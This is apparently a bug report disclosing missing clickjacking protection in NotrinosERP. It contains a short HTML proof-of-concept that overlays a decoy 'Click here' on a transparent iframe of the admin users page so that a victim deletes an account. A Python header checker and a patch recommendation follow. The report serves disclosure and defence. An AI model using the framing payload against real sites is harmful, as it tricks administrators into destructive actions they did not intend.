- Hello team, on notrinoserp there is no clickjacking protection implemented (no `X-Frame-Options` header), so an attacker can perform a clickjacking attack. In this case I'm able to delete a user account via this vulnerability from the admin account. Here is the POC:
![](https://akshayravic09yc47.github.io/proof/not-cj.png)
Exploit Script:

```html
<style>
  /* the framed admin page is rendered semi-transparent on top of the decoy */
  iframe {
    position: relative;
    width: 1200px;
    height: 650px;
    opacity: 0.4;
    z-index: 2;
  }
  /* the decoy text sits underneath, positioned over the target control */
  div {
    position: absolute;
    top: 183px;
    left: 880px;
    z-index: 1;
  }
</style>
<div>Click here</div>
<iframe src="http://127.0.0.1:4445/admin/users.php?"></iframe>
```
Patch Recommendation:
- Add the `X-Frame-Options` header to prevent clickjacking/UI redressing attacks
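As an added example (not part of the original report and not NotrinosERP code), the check below decides from a response's headers whether a browser will refuse to render the page inside a third-party frame, which is what the recommended fix must achieve. It covers the legacy `X-Frame-Options` header the report asks for and the CSP `frame-ancestors` directive that current browsers prefer when both are present; the sample header sets are constructed, not captured from the application.

```python
"""Decide whether HTTP response headers protect a page against clickjacking.

Added example, not code from the original report or from NotrinosERP.
Rules applied (per the X-Frame-Options and CSP Level 3 specifications):
  * If a CSP frame-ancestors directive is present it takes precedence.
  * 'none' (or an empty source list) blocks all framing; a wildcard or a
    bare scheme such as https: allows any origin to frame the page.
  * Otherwise X-Frame-Options DENY / SAMEORIGIN protect; ALLOW-FROM is
    obsolete and ignored by current browsers, so it is treated as no protection.
"""
from typing import Dict, Optional, Tuple

# Constructed sample responses: the unprotected page the report describes,
# and the same page after the recommended header has been added.
SAMPLE_VULNERABLE = {
    "Content-Type": "text/html; charset=UTF-8",
    "Set-Cookie": "PHPSESSID=example; path=/; HttpOnly",
}
SAMPLE_FIXED = {
    "Content-Type": "text/html; charset=UTF-8",
    "X-Frame-Options": "SAMEORIGIN",
    "Content-Security-Policy": "frame-ancestors 'self'",
}


def hardened_headers(same_origin: bool = True) -> Dict[str, str]:
    """Headers to emit on every HTML response to block third-party framing.

    same_origin=True still lets the application frame its own pages;
    same_origin=False forbids framing entirely.
    """
    if same_origin:
        return {"X-Frame-Options": "SAMEORIGIN",
                "Content-Security-Policy": "frame-ancestors 'self'"}
    return {"X-Frame-Options": "DENY",
            "Content-Security-Policy": "frame-ancestors 'none'"}


def _header(headers: Dict[str, str], name: str) -> str:
    """Case-insensitive header lookup; returns '' when absent."""
    for key, value in headers.items():
        if key.lower() == name.lower():
            return value.strip()
    return ""


def _frame_ancestors(csp: str) -> Optional[str]:
    """Return the frame-ancestors source list from a CSP value, or None."""
    for directive in csp.split(";"):
        tokens = directive.strip().split()
        if tokens and tokens[0].lower() == "frame-ancestors":
            return " ".join(tokens[1:]).lower()
    return None


def framing_protected(headers: Dict[str, str]) -> Tuple[bool, str]:
    """Return (protected, reason) for the given response headers."""
    csp = _header(headers, "Content-Security-Policy")
    sources = _frame_ancestors(csp) if csp else None
    if sources is not None:
        if sources in ("", "'none'"):
            return True, "CSP frame-ancestors 'none': no framing allowed"
        tokens = sources.split()
        if "*" in tokens or any(t in ("http:", "https:") for t in tokens):
            return False, f"CSP frame-ancestors permits any origin: {sources}"
        return True, f"CSP frame-ancestors restricts framing to: {sources}"

    xfo = _header(headers, "X-Frame-Options").upper()
    if xfo in ("DENY", "SAMEORIGIN"):
        return True, f"X-Frame-Options {xfo}"
    if xfo.startswith("ALLOW-FROM"):
        return False, "X-Frame-Options ALLOW-FROM is obsolete and ignored by current browsers"
    if xfo:
        return False, f"X-Frame-Options value not recognised: {xfo}"
    return False, "no X-Frame-Options and no CSP frame-ancestors: page can be framed"


if __name__ == "__main__":
    for label, hdrs in (("vulnerable", SAMPLE_VULNERABLE), ("fixed", SAMPLE_FIXED)):
        ok, why = framing_protected(hdrs)
        print(f"{label}: {'protected' if ok else 'NOT protected'} ({why})")
```

Sending both headers is the usual choice: `X-Frame-Options` covers older browsers, while `frame-ancestors` is what modern browsers enforce and is the only one that can allow a specific list of trusted origins.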